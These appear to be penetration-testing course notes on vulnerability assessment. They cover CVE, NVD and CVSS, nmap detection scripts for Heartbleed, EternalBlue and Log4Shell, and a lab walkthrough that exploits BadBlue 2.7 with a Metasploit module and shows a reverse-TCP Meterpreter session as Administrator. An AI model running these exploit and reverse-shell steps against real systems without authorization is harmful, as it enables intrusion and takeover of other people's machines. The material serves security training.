Vulnerability Assessment
⚡ Prerequisites
Basic networks concepts and Cybersecurity
📕 Learning Objectives
Describe and recognize vulnerabilities, exposures reports and national vulnerability database submissions
Describe vulnerability management and perform research
Perform network auditing
🔬 Training list - PentesterAcademy/INE Labs
subscription required
Vulnerabilities
🗒️ A vulnerability is a weakness in an information system, system security procedures, internal controls, or implementation that could be exploited or triggered by a threat source. When exploited, it results in a negative impact to confidentiality, integrity or availability.
Physical layer-e.g.people, physical controls, vaults, door locks, gates, fences, cameras, badge readers, etc. There can be vulnerabilities in those as well, exploited through social engineering techniques or hardware exploitation. for physical access.Vulnerabilities on a computer comes from the operating system, systems and installed services, found by DevSec engineers, Security researchers, Pentesters, Software developers, Users.
NVD (National Vulnerability Database) - a United States government repository of standards based vulnerability management data represented using the SCAP (Security Content Automation Protocol), maintained by NIST.
All vulnerabilities in the NVD have been assigned a CVE identifier.
🗒️ The CVE (Common Vulnerabilities and Exposures) program is a public glossary of vulnerabilities identified for specific code bases, software applications or open libraries, maintained by MITRE corporation. A unique CVE ID is primarily assigned by MITRE or by CNAs (CVE Numbering Authorities), allowing stakeholders, vendors and researchers to commonly identify unique or new exploits and vulnerabilities.
E.g.- high impact, critical vulnerabilities:
Description
Severity
References (Advisories, Solutions, Tools)
Weakness Enumeration
Known Affected Software Configurations
🗒️ The CVSS (CVE Scoring System) is the method used to supply a qualitative measure of severity, consisting of three metric groups: Base, Temporal and Environmental.
Zero-day exploits are vulnerabilities exploits not yet found, used or reported by anyone, or discovered by attackers before the vendor's security team has become aware of it.
e.g.:
Scope, impact and usefulness will come down to business needs, along with the risk management and cybersecurity recommendations.
Risk Management includes vulnerability management. By doing a VA (Vulnerability Assessment), the pentester is going to define, identify, classify and prioritize security deficiencies in computer systems, applications, and network infrastructures. Some procedures to find vulnerabilities are:
Scanning
Asset Identification and Research
Fuzz Testing (input/handling validation)
🗒️ Nessus is a network vulnerability scanning tool. It can be hosted locally and used for Vulnerability Assessment.
Case Studies
Heartbleed
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
Show accepted ciphersuites and compressors with nmap ssl-enum-ciphers script.
nmap -sV --script ssl-enum-ciphers -p <SECURED_PORT> <TARGET>Detect OpenSSL Heartbleed bug vulnerable servers with nmap ssl-heartbleed script, or with Metasploit enumerate module.
nmap -sV --script ssl-heartbleed -p 443 <TARGET>
# Other ports can be used tooexploit-db.com is useful too
❗ always check the exploit behavior before using it
search for
heartbleed
EternalBlue
The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka "Windows SMB Remote Code Execution Vulnerability." This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.
Widely used in the WannaCry ransomware attack.
The EternalBlue exploit developed by the NSA was leaked to public in 2017 (by Shadow Brokers hacker group).
Specific nmap smb-vuln-ms17-010 script
nmap --script smb-vuln-ms17-010 -p 445 <TARGET>
🔬 Check the Lab 2 - Eternal Blue here
BlueKeep
A remote code execution vulnerability exists in Remote Desktop Services formerly known as Terminal Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka Remote Desktop Services Remote Code Execution Vulnerability.
The vulnerability was made public by Microsoft in May 2019 and affected Windows XP, Windows Vista, Windows 7, Windows Server 2008 & R2.
It allows access to a chunk of kernel memory, allowing the attacker to remotely execute arbitary code at the system level without authentication.
BlueKeep PoC's (Proof of Concepts) and exploits could be malicious in nature.
🔬 Check the Lab 2 - BlueKeep here
Log4J
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
nmap-log4shell- a NSE script for Apache Log4j RCE vulnerability discovery
nmap --script log4shell.nse --script-args log4shell.callback-server=<CALLBACK_SERVER_IP>:1389 -p 8080 <TARGET_HOST>
Vulnerable Lab
🔬 Windows: Easy File Sharing Server
Target IP:
10.2.28.13Fingerprint the application and exploit the found vulnerability
ping 10.2.28.13
nmap -sV 10.2.28.1380/tcp open http BadBlue httpd 2.7
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Research the vulnerability of
BadBlue httpd 2.7using various tools:Google it
Stack-based buffer overflow in the PassThru functionality in ext.dll in BadBlue 2.72b and earlier allows remote attackers to execute arbitrary code via a long query string.
Search for exploits from exploit-db.com or using a command line tool such as
searchsploit
searchsploit- a command line search tool for Exploit-DB. A copy of Exploit Database can be used offline.
Use Metasploit to exploit the target using the PassThru Buffer Overflow module
This module exploits a stack buffer overflow in the PassThru functionality in ext.dll in BadBlue 2.72b and earlier.
❗ Before running an exploit, ALWAYS check its Source Code to understand what it is doing❗
msfconsolesearch badblue 2.7
use exploit/windows/http/badblue_passthru
set RHOSTS 10.2.28.13
exploit[*] Started reverse TCP handler on 10.10.24.3:4444
[*] Trying target BadBlue EE 2.7 Universal...
[*] Sending stage (180291 bytes) to 10.2.28.13
[*] Meterpreter session 1 opened (10.10.24.3:4444 -> 10.2.28.13:49330) at 2023-02-25 15:32:52 +0530
meterpreter > getuid
Server username: WIN-OMCNBKR66MN\AdministratorUse meterpreter commands to find the flag
shell
cd /
dir
type flag.txt
Last updated
Was this helpful?